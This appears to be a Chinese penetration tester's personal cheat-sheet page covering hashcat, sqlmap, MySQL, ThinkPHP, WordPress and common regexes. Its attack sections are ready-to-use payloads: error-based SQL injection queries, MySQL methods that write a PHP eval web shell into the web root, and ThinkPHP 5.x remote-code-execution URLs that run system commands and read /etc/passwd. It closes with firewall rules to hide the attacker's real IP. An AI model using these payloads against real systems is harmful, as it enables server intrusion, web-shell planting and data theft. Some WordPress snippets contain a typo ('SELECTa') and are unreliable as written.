笔记 | MrWu

1.根据基础特征指定规则生成密码字典

hashcat --stdout d:\Desktop\1.txt -r f:\hashcat\rules\dive.rule -o d:\Desktop\tmp.txt

2.linux 下整理字典，清除重复、不可见等字符

strings tmp.txt > tmp2.txt

sort -u tmp2.txt > tmp3.txt

1.基本命令

sqlmap -u "https://www.mrwu.red/test.php?id=2" -v 3

sqlmap -r /root/desktop/1.txt -v 3

2.注入类型

--technique
B : 基于Boolean的盲注（Boolean based blind）

Q : 内联查询（Inline queries）

T : 基于时间的盲注（time based blind）

U : 基于联合查询（Union query based）

E : 基于错误（error based）

S : 栈查询（stack queries）

3.减慢时间延迟注入

--delay=3.5 --time-sec=60

4.清空会话

--flush-session

5.代理注入

--proxy=http://127.0.0.1:1066

6.注入等级（1-5）

--level 3

7.加载过滤脚本（具体脚本查看 sqlmap/tamper 目录）

--tamper=appendnullbyte.py

8.禁止某个payload 关键词

--test-skip=UNION

9.指定线程(提示方法请移步)

--threads=200

10.payload 前后缀自定义

--prefix "')" --suffix "#"

11.dump 指定3条数

--dump --start 1 --stop 3

12.自动选择,快速注入

--batch --smart

13.连接数据裤注入

sqlmap -d mysql://root:root@127.0.0.1:3306/mysql

十种报错注入

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

GETSHELL 方法汇总

1.查询信息

select version();

@@plugin_dir

SHOW VARIABLES LIKE 'plugin_dir';

// 2个表关联之内连接查询

SELECT * FROM `A表` INNER JOIN `B表` ON A表.A字段=B表.B字段;

2.导出 SHELL

select '<?php eval($_POST[mrwu]) ?>' into outfile '/var/www/mrwu.php';

select '<?php eval($_POST[mrwu]) ?>' into dumpfile '/var/www/mrwu.php';

Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('<?php eval($_POST[mrwu]) ?>');Select cmd from temp into outfile '/var/www/mrwu.php';Drop TABLE IF EXISTS temp;

phpmyadmin导入.sql.zip

source /tmp/mrwu.sql

tee /var/www/mrwu.php;select '<?php eval($_POST[mrwu]) ?>';

set global general_log=on;

set global general_log_file='/app/www/cjs_new/web/i.php';

select '<?php eval($_POST[mrwu]) ?>';

aaa'into outfile '/var/www/mrwu.php' fields terminated by '<?php eval($_POST[mrwu]) ?>'#

计划任务、启动项、udf、mof

1.> 5.x getshell

index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

index/\think\Request/input&filter=phpinfo&data=1

index/think\config/get&name=database.hostname

index/think\config/get&name=database.password

index/\think\Request/input&filter=system&data=id

index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>

index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

/?s=index/think\Error/appError&errno=1&errstr=1&errline=1&errfile=/etc/passwd

/index.php?s=captcha
POST:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../../../../robots.txt&jltx=echo '123';

call_user_func_array、file_put_contents、assert

2.日志路径

Application\Runtime\Logs\Home\16_09_09.log

Runtime\Logs\Home\16_09_09.log

/runtime/log/201905/04.log

/data/runtime/Logs/Admin/18_09_14.log

3.读取数据库配置文件

直接在 index.php 里面加 dump(config('database.password'));

1.另一个更新正在进行解决方法

//将下方代码添加到 function.php 文件末尾，然后刷新网站首页，更新完后记得删除或者注释下方代码。

global $wpdb;
$wpdb->query("DELETE FROM wp_options WHERE option_name = 'core_updater.lock'");

2.WordPress调试-输出数据库sql语句

print_r($wpdb->queries);

3.数据裤查询归类

global $wpdb; //调用数据裤全局变量

//1、学会使用insert()方法向数据库中添加数据

$wpdb->insert( $wpdb->prefix . 'xs', array( 'xm' => '大江网络', 'xb' => '男', 'xq' => 'wordpress' ) );

//2、学会使用update()方法更新数据库中的数据

$wpdb->update( $wpdb->prefix . 'xs', array( 'xb' => '男', 'xq' => 'wordpress' ), array( 'xq' => '打豆豆' ) );

//3、学会使用get_var()获取数据库中的数据

$xm = $wpdb->get_var( 'SELECT * FROM `' . $wpdb->prefix . 'xs`' , 3 , 2 );

//4、学会使用query()方法删除数据库中的数据

$wpdb->query( "DELETE FROM `" . $wpdb->prefix . "xs` WHERE `xq` = 'wordpress'" );

//5、学会使用get_results()获取数据库中的数据

$rows = $wpdb->get_results( "SELECTa * FROM `" . $wpdb->prefix . "xs`" , ARRAY_A );
foreach ( $rows as $row ) {
echo $row['xm'] . '';
}

//6、学会使用get_row()获取数据库中的数据

$row = $wpdb->get_row( "SELECTa * FROM `" . $wpdb->prefix . "xs`" , ARRAY_A , 1 );

//7、学会使用show_errors()、print_error()、hide_errors()、last_error调试SQL
$wpdb->print_error();

邮箱

只允许英文字母、数字、下划线、英文句号、以及中划线组成 gaozihang-001@gmail.com

^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$

高子航001Abc@bowbee.com.cn 名称允许汉字、字母、数字，域名只允许英文域名

^[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$

电话

13012345678 手机号

^1(3|4|5|6|7|8|9)\d{9}$

XXX-XXXXXXX XXXX-XXXXXXXX 固定电话

(\(\d{3,4}\)|\d{3,4}-|\s)?\d{8}

域名

https://google.com/

^((http:\/\/)|(https:\/\/))?([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}(\/)

IP

127.0.0.1

((?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d))

帐号校验

gaozihang_001 字母开头，允许5-16字节，允许字母数字下划线

^[a-zA-Z][a-zA-Z0-9_]{4,15}$

字符校验

汉字 高子航

^[\u4e00-\u9fa5]{0,}$

英文和数字

^[A-Za-z0-9]+$

长度为3-20的所有字符

^.{3,20}$

英文字符由26个英文字母组成的字符串

^[A-Za-z]+$

由26个大写英文字母组成的字符串

^[A-Z]+$

由26个小写英文字母组成的字符串

^[a-z]+$

由数字和26个英文字母组成的字符串

^[A-Za-z0-9]+$

由数字、26个英文字母或者下划线组成的字符串

^\w+$

中文、英文、数字包括下划线

^[\u4E00-\u9FA5A-Za-z0-9_]+$

中文、英文、数字但不包括下划线等符号

^[\u4E00-\u9FA5A-Za-z0-9]+$

禁止输入含有%&',;=?$"等字符

[^%&',;=?$\x22]+

禁止输入含有~的字符

[^~\x22]+

数字正则

整数

^-?[1-9]\d*$

正整数

^[1-9]\d*$

负整数

^-[1-9]\d*$

非负整数

^[1-9]\d*|0$

非正整数

^-[1-9]\d*|0$

浮点数

^-?([1-9]\d*\.\d*|0\.\d*[1-9]\d*|0?\.0+|0)$

正浮点数

^[1-9]\d*\.\d*|0\.\d*[1-9]\d*$

负浮点数

^-([1-9]\d*\.\d*|0\.\d*[1-9]\d*)$

非负浮点数

^[1-9]\d*\.\d*|0\.\d*[1-9]\d*|0?\.0+|0$

非正浮点数

^(-([1-9]\d*\.\d*|0\.\d*[1-9]\d*))|0?\.0+|0$

1. 隐藏真实IP，强制电脑出网流量只从VPN出.

系统管理员命令窗口执行以下命令：

netsh advfirewall set allprofiles firewallpolicy allowinbound,blockoutbound #阻止所有出网流量

netsh advfirewall firewall add rule name="allowvpn1" dir=out action=allow enable=yes remoteip="VPN外网服务器地址, 192.168.0.0/24" #添加出网规则，只允许指定IP的流量出网

netsh advfirewall firewall add rule name="allowvpnremote1" dir=out action=allow enable=yes localip="VPN分配的内网IP" #连上VPN后只允许VPN分配的内网IP出网

笔记

好记性不如烂笔头，本页记录一些时常用到的小玩意，持续更新，如需要补充欢迎评论提出.

Hashcat 篇

SQLMAP 篇

MySql 篇

十种报错注入

GETSHELL 方法汇总

thinkPHP 方法汇总

WordPress 篇

常用正则收集

邮箱

电话

域名

IP

帐号校验

字符校验

数字正则

渗透日常小笔记

1. 隐藏真实IP，强制电脑出网流量只从VPN出.